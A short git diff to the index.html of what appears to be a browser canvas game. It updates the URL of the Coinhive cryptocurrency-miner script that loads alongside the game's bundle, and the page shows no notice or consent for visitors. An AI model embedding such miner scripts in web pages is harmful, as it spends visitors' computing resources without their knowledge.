New coinhive link to script

--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
 </head>
 <body>
     <canvas id="gc" width="1000" height="600" style="display: block;margin: auto;"></canvas>
-    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
     <script src="bundle.js"> </script>
 </body>
 </html>
